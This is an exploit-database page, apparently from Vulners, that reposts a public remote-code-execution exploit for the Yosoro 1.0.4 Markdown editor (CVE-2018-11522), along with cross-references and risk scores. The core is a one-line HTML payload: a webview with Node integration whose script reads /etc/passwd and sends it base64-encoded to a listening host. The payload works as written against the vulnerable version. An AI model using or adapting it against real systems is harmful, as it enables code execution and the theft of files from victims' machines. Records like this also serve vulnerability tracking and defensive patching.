Yosoro 1.0.4 - Remote Code Execution

🗓️ 30 May 2018 00:00:00Reported by Carlo PelliccioniType

Yosoro 1.0.4 - Remote Code Execution, CVE-2018-11522, MacOS 10.13.

Reporter	Title	Published	Views	Family All 9
0day.today	Yosoro 1.0.4 - Remote Code Execution Vulnerability	30 May 201800:00	–	zdt
CNVD	Yosoro Cross-Site Scripting Vulnerability	13 Jul 201800:00	–	cnvd
CVE	CVE-2018-11522	1 Jun 201821:00	–	cve
Cvelist	CVE-2018-11522	1 Jun 201821:00	–	cvelist
EUVD	EUVD-2018-3551	7 Oct 202500:30	–	euvd
exploitpack	Yosoro 1.0.4 - Remote Code Execution	30 May 201800:00	–	exploitpack
NVD	CVE-2018-11522	2 Jun 201801:29	–	nvd
Packet Storm	Yosoro 1.0.4 Remote Code Execution	30 May 201800:00	–	packetstorm
Prion	Cross site scripting	2 Jun 201801:29	–	prion

# Exploit title: Yosoro 1.0.4 - Remote Code Execution
# Date: 2018-05-29
# Exploit Author: Carlo Pelliccioni
# Vendor homepage: https://yosoro.coolecho.net/
# Software link: https://github.com/IceEnd/Yosoro/releases/download/v1.0.4/Yosoro-darwin-x64-1.0.4.zip
# Version: 1.0.4
# Tested on: MacOS 10.13.4
# CVE: CVE-2018-11522
#  _  _            _    _    _             ___                      _  _         
# | || | __ _  __ | |__| |_ (_)__ __ ___  / __| ___  __  _  _  _ _ (_)| |_  _  _ 
# | __ |/ _` |/ _|| / /|  _|| |\ V // -_) \__ \/ -_)/ _|| || || '_|| ||  _|| || |
# |_||_|\__,_|\__||_\_\ \__||_| \_/ \___| |___/\___|\__| \_,_||_|  |_| \__| \_, |

# Remote Code Execution (CVE-2018-11522)
# Payload: 

<webview src="data:text/html,<script>var read = require('fs').readFileSync('/etc/passwd', 'utf-8'); document.location='http://127.0.0.1:8089/'+btoa(read); </script>" nodeintegration></webview>

30 May 2018 00:00Current

6.3Medium risk

Vulners AI Score6.3

CVSS 24.3

CVSS 36.1

EPSS0.02708